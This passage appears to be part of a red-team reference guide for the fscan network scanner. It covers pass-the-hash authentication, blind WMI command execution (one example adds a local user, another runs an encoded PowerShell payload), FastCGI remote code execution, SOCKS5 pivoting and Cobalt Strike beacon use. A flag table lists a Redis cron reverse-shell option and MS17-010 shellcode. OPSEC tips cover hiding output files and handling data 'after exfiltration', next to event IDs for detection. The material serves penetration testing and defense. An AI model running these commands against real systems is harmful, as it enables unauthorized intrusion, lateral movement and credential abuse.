    635 ./fscan -h 192.168.1.50 -m wmiexec -user administrator -pwd Password1 -c "whoami"
    636 
    637 # WMI with hash
    638 ./fscan -h 192.168.1.50 -m wmiexec -user administrator -hash <NTLM_hash> -c "net user fscan fscan123 /add"
    639 ```
    640 
    641 > **Note —** + Pass-the-Hash Options
    642 > 1. **-m smb2**: SMB pass-the-hash module
    643 > 2. **-m wmiexec**: WMI remote execution (no output returned)
    644 > 3. **-hash \<string\>**: NTLM hash (LM:NTLM or NTLM-only; LM can be `aad3b435b51404eeaad3b435b51404ee` for modern hashes)
    645 > 4. **-user \<string\>**: Username
    646 > 5. **-pwd \<string\>**: Password (for WMI without hash)
    647 > 6. **-c \<string\>**: Command to execute (WMI only)
    648 > 7. **-domain \<string\>**: Domain (optional, for domain accounts)
    649 > 8. **-wmi**: Enable WMI scanning (auto-enabled with `-m wmiexec`)
    650 
    651 ```bash
    652 # Pass-the-hash SMB authentication test
    653 ./fscan -h 10.0.1.0/24 -m smb2 -user admin -hash 00000000000000000000000000000000:7ECFFFF0C3548187607A14BAD0F88BB1
    654 
    655 # WMI command execution (blind)
    656 ./fscan -h 192.168.1.100 -m wmiexec -user administrator -pwd P@ssw0rd -c "powershell -enc <base64_payload>"
    657 
    658 # Domain pass-the-hash
    659 ./fscan -h 172.16.0.50 -m smb2 -domain CORP -user Administrator -hash <hash>
    660 ```
    661 
    662 > **Note —** + Output Interpretation
    663 > 1. **[+] SMB 192.168.1.50:445 administrator \<hash\>**: Pass-the-hash succeeded
    664 > 2. **[+] WMIExec 192.168.1.50 Success**: Command sent (no output returned; verify via other means)
    665 
    666 > **Note —** + OPSEC and Detection Notes
    667 > 1. **High noise**: [NTLM](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) authentication logged (Event ID 4624 type 3, 4776); pass-the-hash is a known attack pattern
    668 > 2. WMI execution creates process (Event ID 4688, Sysmon Event ID 1) and WMI activity (Event ID 5857–5861)
    669 > 3. No command output returned by WMI module; blind execution only
    670 > 4. Pass-the-hash detected by modern EDR and Windows Defender Credential Guard (if enabled)
    671 
    672 > **Note —** + Technical Notes
    673 > 1. Pass-the-hash (`-m smb2`) added in v1.8.2
    674 > 2. WMI no-echo execution (`-m wmiexec`) added in v1.8.2
    675 > 3. LM hash optional; modern Windows uses NTLM-only
    676 > 4. WMI execution less reliable than SSH; prefer authenticated SMB enumeration or [Impacket](https://github.com/fortra/impacket) wmiexec.py
    677 
    678 > **Note —** + Common Errors
    679 > 1. **Access denied**: wrong hash, user lacks administrator rights, or Credential Guard enabled
    680 > 2. **timeout**: SMB/WMI service unavailable or firewall
    681 > 3. WMI command failed silently: verify command syntax, check target logs
    682 
    683 ---
    684 
    685 ## FastCGI Exploitation
    686 
    687 > **Note —** + Purpose
    688 > Detect and exploit [FastCGI](https://en.wikipedia.org/wiki/FastCGI) (PHP-FPM) misconfiguration to execute arbitrary code
    689 
    690 ```bash
    691 # Auto FastCGI scan during full scan
    692 ./fscan -h 192.168.1.0/24
    693 
    694 # Target specific FastCGI port
    695 ./fscan -h 192.168.1.50 -p 9000
    696 
    697 # Specify remote file path (optional)
    698 ./fscan -h 192.168.1.50 -path /var/www/html/index.php
    699 ```
    700 
    701 > **Note —** + FastCGI Options
    702 > 1. **-path \<string\>**: Remote file path for FastCGI exploit (default tries common paths)
    703 > 2. No dedicated `-m fcgi` module; auto-detected when port 9000 (or custom) is scanned
    704 
    705 ```bash
    706 # Scan /24 for exposed FastCGI
    707 ./fscan -h 10.0.1.0/24 -p 9000
    708 
    709 # Exploit with custom path
    710 ./fscan -h 192.168.1.75 -p 9000 -path /usr/share/nginx/html/info.php
    711 ```
    712 
    713 > **Note —** + Output Interpretation
    714 > 1. **[+] FastCGI 192.168.1.50:9000 RCE**: Vulnerable to remote code execution
    715 > 2. Command output or error message may be displayed inline
    716 
    717 > **Note —** + OPSEC and Detection Notes
    718 > 1. FastCGI exploitation logged in PHP-FPM logs, web server logs, and system logs
    719 > 2. RCE attempts highly visible; spawned processes logged
    720 > 3. Exposed FastCGI (port 9000 public) is severe misconfiguration; uncommon but high-value
    721 
    722 > **Note —** + Technical Notes
    723 > 4. FastCGI module added in v1.6.2
    724 > 5. Primarily targets PHP-FPM; other FastCGI implementations less tested
    725 
    726 > **Note —** + Common Errors
    727 > 6. **Connection refused**: FastCGI not exposed or firewall
    728 > 7. **File not found**: specified `-path` does not exist on target
    729 > 8. Exploit failed: FastCGI version or configuration not vulnerable
    730 
    731 ---
    732 
    733 ## Output and Reporting
    734 
    735 > **Note —** + Purpose
    736 > Save scan results to file (text, JSON); control output verbosity and format
    737 
    738 ```bash
    739 # Default output to result.txt
    740 ./fscan -h 192.168.1.0/24
    741 
    742 # Custom output file
    743 ./fscan -h 192.168.1.0/24 -o /tmp/scan_results.txt
    744 
    745 # JSON output
    746 ./fscan -h 192.168.1.0/24 -o results.json -json
    747 
    748 # No file output (stdout only)
    749 ./fscan -h 192.168.1.0/24 -no
    750 
    751 # Silent scan (minimal stdout)
    752 ./fscan -h 192.168.1.0/24 -silent
    753 
    754 # No color output
    755 ./fscan -h 192.168.1.0/24 -nocolor
    756 ```
    757 
    758 > **Note —** + Output Options
    759 > 1. **-o \<file\>**: Output file path (default `result.txt`)
    760 > 2. **-no**: Do not save output to file
    761 > 3. **-json**: Output in JSON format (v1.8.3+)
    762 > 4. **-silent**: Suppress most stdout (for Cobalt Strike/automation; results still saved unless `-no`)
    763 > 5. **-nocolor**: Disable ANSI color codes (v1.8.3+)
    764 > 6. **-debug \<int\>**: Print progress/error summary every N seconds (default 60)
    765 
    766 ```bash
    767 # Save to custom file
    768 ./fscan -h 10.0.0.0/16 -o /opt/scans/network_scan_2024-02-16.txt
    769 
    770 # JSON output for automated parsing
    771 ./fscan -h 192.168.1.0/24 -o scan.json -json
    772 
    773 # Cobalt Strike beacon (silent, save to file)
    774 ./fscan -h 172.16.0.0/24 -silent -o /tmp/.scan
    775 
    776 # No file, stdout only
    777 ./fscan -h 192.168.1.50 -no
    778 
    779 # Disable color for log files
    780 ./fscan -h 10.0.1.0/24 -nocolor -o scan.log
    781 ```
    782 
    783 > **Note —** + Output Format Interpretation
    784 > 1. **Text format**: human-readable, one result per line with prefixes (`[+]` success, `[-]` failure, `[*]` info)
    785 > 2. **JSON format**: structured records (target, service, result, timestamp)
    786 > 3. **-silent**: only errors and critical findings printed to stdout
    787 
    788 > **Note —** + OPSEC Notes
    789 > 4. Output files contain sensitive data (credentials, vulnerabilities); encrypt or secure-delete after exfiltration
    790 > 5. Default `result.txt` in current directory; can be forensic artefact
    791 > 6. `-silent` useful for beacon/agent execution to avoid console noise
    792 
    793 > **Note —** + Technical Notes
    794 > 7. JSON output (`-json`) and color control (`-nocolor`) added in v1.8.3
    795 > 8. `-silent` intended for [Cobalt Strike](https://www.cobaltstrike.com/)/[Metasploit](https://www.metasploit.com/) integration
    796 
    797 > **Note —** + Common Errors
    798 > 9. **Permission denied**: cannot write to `-o` path; check directory permissions
    799 > 10. Corrupt JSON: fscan crashed mid-scan; use `-debug` to diagnose
    800 
    801 ---
    802 
    803 ## Proxy and Network Options
    804 
    805 > **Note —** + Purpose
    806 > Route HTTP/SOCKS5 traffic through proxies; control network behaviour for pivoting or evasion
    807 
    808 ```bash
    809 # HTTP proxy for web PoC requests
    810 ./fscan -h 192.168.1.0/24 -proxy http://127.0.0.1:8080
    811 
    812 # SOCKS5 proxy for TCP connections (limited support)
    813 ./fscan -h 192.168.1.0/24 -socks5 127.0.0.1:1080
    814 
    815 # Scan via URL with proxy
    816 ./fscan -u http://internal.target.local -proxy http://pivot.host:8080
    817 ```
    818 
    819 > **Note —** + Proxy Options
    820 > 1. **-proxy \<url\>**: HTTP proxy for web requests (PoC scanning, web fingerprinting)
    821 > 2. **-socks5 \<IP:port\>**: SOCKS5 proxy for TCP connections (limited; some modules unsupported)
    822 > 3. Note: `-socks5` disables timeouts (hardcoded behaviour)
    823 
    824 ```bash
    825 # Burp Suite interception
    826 ./fscan -u https://192.168.1.100:8443 -proxy http://127.0.0.1:8080
    827 
    828 # Pivot via SOCKS5 (e.g., SSH tunnel)
    829 ssh -D 1080 user@pivot.host
    830 ./fscan -h 10.10.10.0/24 -socks5 127.0.0.1:1080
    831 
    832 # Chain: SOCKS5 pivot + HTTP proxy for PoCs
    833 ./fscan -h 172.16.0.0/16 -socks5 127.0.0.1:1080 -proxy http://127.0.0.1:8080
    834 ```
    835 
    836 > **Note —** + OPSEC and Detection Notes
    837 > 1. Proxy traffic logged by proxy server (access logs, SIEM)
    838 > 2. SOCKS5 proxy SSH tunnel creates persistent SSH session (logged)
    839 > 3. HTTP proxy (Burp) exposes all traffic to interception/logging
    840 > 4. `-socks5` timeout disabled; scans may hang on unreachable targets
    841 
    842 > **Note —** + Technical Notes
    843 > 1. SOCKS5 support added in v1.8.0; limited to simple TCP functions
    844 > 2. HTTP proxy works for all web modules (fingerprinting, PoC scanning)
    845 > 3. SOCKS5 does not support all Go libraries used in fscan; expect partial functionality
    846 
    847 > **Note —** + Common Errors
    848 > 4. **proxy connection refused**: proxy unreachable or not running
    849 > 5. **SOCKS5 handshake failed**: incorrect proxy address or authentication required (fscan does not support SOCKS5 auth)
    850 > 6. Timeout issues with SOCKS5: fscan disables timeout when SOCKS5 is set; manual Ctrl+C required
    851 > 7. Some modules ignore SOCKS5: brute-force and certain PoCs may not route through SOCKS5
    852 
    853 ---
    854 
    855 ## Advanced Tuning Options
    856 
    857 > **Note —** + Purpose
    858 > Fine-tune scan behaviour, thread counts, timeouts, and special modes for large/complex engagements
    859 
    860 ```bash
    861 # High-speed scan (1000 threads)
    862 ./fscan -h 10.0.0.0/16 -t 1000 -np -nobr -nopoc
    863 
    864 # Slow, stealthy scan (50 threads, 10s timeout)
    865 ./fscan -h 192.168.1.0/24 -t 50 -time 10 -br 1
    866 
    867 # Debug mode (verbose errors every 30s)
    868 ./fscan -h 192.168.1.0/24 -debug 30
    869 ```
    870 
    871 > **Note —** + Advanced Options
    872 > 1. **-t \<int\>**: Thread count (default 600); higher = faster but noisier
    873 > 2. **-time \<int\>**: TCP/ICMP timeout in seconds (default 3)
    874 > 3. **-wt \<int\>**: Web request timeout in seconds (default 5)
    875 > 4. **-br \<int\>**: Brute-force threads per service (default 1)
    876 > 5. **-num \<int\>**: PoC concurrency/rate (default 20)
    877 > 6. **-debug \<int\>**: Print progress every N seconds (default 60)
    878 > 7. **-top \<int\>**: Show top N live segments when scanning /8 (default 10)
    879 > 8. **-full**: Exhaustive PoC scanning (Shiro 100 keys, backup file fuzzing)
    880 > 9. **-dns**: Enable DNS log-based PoCs (requires external DNS log service)
    881 
    882 ```bash
    883 # Fast reconnaissance (skip brute and PoC)
    884 ./fscan -h 172.16.0.0/16 -t 1200 -np -nobr -nopoc -time 1
    885 
    886 # Thorough scan (full PoCs, slow)
    887 ./fscan -h 192.168.1.0/24 -full -t 200 -time 5 -wt 10 -br 2
    888 
    889 # Debug large scan
    890 ./fscan -h 10.0.0.0/8 -m icmp -debug 10
    891 
    892 # Custom thread tuning for unstable network
    893 ./fscan -h 192.168.1.0/24 -t 100 -time 10 -wt 15
    894 ```
    895 
    896 > **Note —** + Tuning Guidelines
    897 > 1. **High thread counts** reduce scan time but increase errors (timeouts, connection refused)
    898 > 2. **Low thread counts** reduce noise but increase scan duration (longer dwell time)
    899 > 3. **-full mode** extremely noisy (100+ Shiro requests, backup file fuzzing)
    900 > 4. **-dns PoCs** require external service; DNS queries logged by authoritative DNS servers
    901 > 5. Default threads (600) optimised for /24; adjust for larger/smaller ranges
    902 
    903 > **Note —** + OPSEC Notes
    904 > 6. High thread counts create traffic bursts (NetFlow anomalies, connection spikes)
    905 > 7. `-full` mode generates extreme noise and may trigger rate-limiting/WAF blocks
    906 > 8. `-debug` provides progress feedback: periodic messages (completed X of Y)
    907 
    908 > **Note —** + Common Errors
    909 > 9. **too many open files**: reduce `-t` or raise OS limits (`ulimit -n 10000` on Linux)
    910 > 10. Timeouts on slow links: increase `-time` and `-wt`
    911 > 11. Memory exhaustion on large scans: reduce `-t`, split CIDR ranges
    912 
    913 ---
    914 
    915 ## Complete Flag Reference
    916 
    917 > **Note —** + All Command-Line Flags
    918 
    919 | Flag | Description | Example |
    920 |:---|:---|:---|
    921 | **-h \<targets\>** | IP/CIDR/range/comma-separated | `-h 192.168.1.0/24` |
    922 | **-hf \<file\>** | Target file (one IP/CIDR per line) | `-hf targets.txt` |
    923 | **-hn \<exclude\>** | Exclude IPs/CIDR | `-hn 192.168.1.1/28` |
    924 | **-p \<ports\>** | Ports (single/list/range/group) | `-p 22,80,443` or `-p web` |
    925 | **-pa \<ports\>** | Add ports to defaults | `-pa 3389,5900` |
    926 | **-pn \<ports\>** | Exclude ports | `-pn 445` |
    927 | **-portf \<file\>** | Port file | `-portf ports.txt` |
    928 | **-m \<module\>** | Scan module | `-m ssh` (all, icmp, netbios, smb, smb2, ssh, rdp, ftp, mssql, mysql, postgresql, redis, oracle, mongodb, memcached, ms17010, wmiexec, fcgi) |
    929 | **-t \<int\>** | Thread count (default 600) | `-t 1000` |
    930 | **-time \<int\>** | Timeout seconds (default 3) | `-time 10` |
    931 | **-wt \<int\>** | Web timeout seconds (default 5) | `-wt 15` |
    932 | **-br \<int\>** | Brute-force threads (default 1) | `-br 3` |
    933 | **-num \<int\>** | PoC rate (default 20) | `-num 50` |
    934 | **-user \<string\>** | Username | `-user admin` |
    935 | **-userf \<file\>** | Username file | `-userf users.txt` |
    936 | **-usera \<string\>** | Add username to defaults | `-usera testuser` |
    937 | **-pwd \<string\>** | Password | `-pwd password123` |
    938 | **-pwdf \<file\>** | Password file | `-pwdf passwords.txt` |
    939 | **-pwda \<string\>** | Add password to defaults | `-pwda testpass` |
    940 | **-hash \<string\>** | NTLM hash (LM:NTLM or NTLM-only) | `-hash <LM>:<NTLM>` |
    941 | **-domain \<string\>** | SMB/WMI domain | `-domain CORP` |
    942 | **-sshkey \<file\>** | SSH private key | `-sshkey id_rsa` |
    943 | **-c \<string\>** | Command (SSH/WMI) | `-c "whoami; id"` |
    944 | **-rf \<file\>** | Redis SSH public key file | `-rf id_rsa.pub` |
    945 | **-rs \<IP:port\>** | Redis cron reverse shell target | `-rs 10.0.1.5:4444` |
    946 | **-sc \<type\>** | MS17-010 shellcode | `-sc add` |
    947 | **-path \<string\>** | FastCGI/SMB remote file path | `-path /var/www/html/index.php` |
    948 | **-u \<url\>** | Single URL (comma-separated in v1.8.1+) | `-u http://target.local` |
    949 | **-uf \<file\>** | URL file | `-uf urls.txt` |
    950 | **-proxy \<url\>** | HTTP proxy | `-proxy http://127.0.0.1:8080` |
    951 | **-socks5 \<IP:port\>** | SOCKS5 proxy | `-socks5 127.0.0.1:1080` |
    952 | **-cookie \<string\>** | PoC cookie | `-cookie "session=abc123"` |
    953 | **-pocpath \<dir\>** | Custom PoC directory (xray YAML) | `-pocpath ./pocs/` |
    954 | **-pocname \<string\>** | Filter PoCs by name | `-pocname weblogic` |
    955 | **-o \<file\>** | Output file (default result.txt) | `-o scan.txt` |
    956 | **-json** | JSON output (v1.8.3+) | `-json` |
    957 | **-no** | No file output | `-no` |
    958 | **-silent** | Silent mode (minimal stdout) | `-silent` |
    959 | **-nocolor** | Disable color (v1.8.3+) | `-nocolor` |
    960 | **-np** | Skip ping/ICMP | `-np` |
    961 | **-ping** | Use OS ping instead of raw ICMP | `-ping` |
    962 | **-nobr** | Skip brute-force | `-nobr` |
    963 | **-nopoc** | Skip web PoC scanning | `-nopoc` |
    964 | **-noredis** | Skip Redis security tests | `-noredis` |
    965 | **-full** | Full PoC scan (Shiro 100 keys, backup fuzzing) | `-full` |
    966 | **-dns** | Enable DNS log PoCs | `-dns` |
    967 | **-wmi** | Enable WMI | `-wmi` |
    968 | **-debug \<int\>** | Progress interval seconds (default 60) | `-debug 30` |
    969 | **-top \<int\>** | Top N live segments (/8 scans, default 10) | `-top 20` |
    970 
    971 ---
    972 
    973 ## References
    974 
    975 1. [fscan GitHub Repository](https://github.com/shadow1ng/fscan)
    976 2. [fscan Releases](https://github.com/shadow1ng/fscan/releases)
    977 3. [fscan v1.8.0 Release Notes](https://github.com/shadow1ng/fscan/releases/tag/1.8.0)
    978 4. [fscan v1.8.2 Release Notes](https://github.com/shadow1ng/fscan/releases/tag/1.8.2)
    979 5. [fscan v1.8.3 Release Notes](https://github.com/shadow1ng/fscan/releases/tag/1.8.3)
    980 6. [fscan Command Injection Vulnerability - Issue #392](https://github.com/shadow1ng/fscan/issues/392)
    981 7. [HackTricks - Redis Security](https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis)
    982 8. [Microsoft Active Directory Domain Services Overview](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview)
    983 9. [Microsoft SMB Protocol Overview](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview)
    984 10. [Microsoft NTLM Overview](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview)
    985 11. [Microsoft WMI Documentation](https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page)
    986 12. [EternalBlue (MS17-010) - Wikipedia](https://en.wikipedia.org/wiki/EternalBlue)
    987 13. [xray Security Scanner](https://github.com/chaitin/xray)
    988 14. [Impacket Toolkit](https://github.com/fortra/impacket)
    989 
    990 ---
    991 
    992 #fscan #reconnaissance #host-discovery #port-scanning #brute-force #pass-the-hash #web-fingerprinting #vulnerability-scanning #MS17-010 #Redis-exploitation #lateral-movement #SMB #SSH #WMI #internal-network #red-team #penetration-testing